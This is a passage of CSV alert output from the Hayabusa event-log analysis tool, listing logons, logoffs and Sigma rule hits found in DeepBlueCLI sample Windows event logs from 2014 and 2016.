+09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 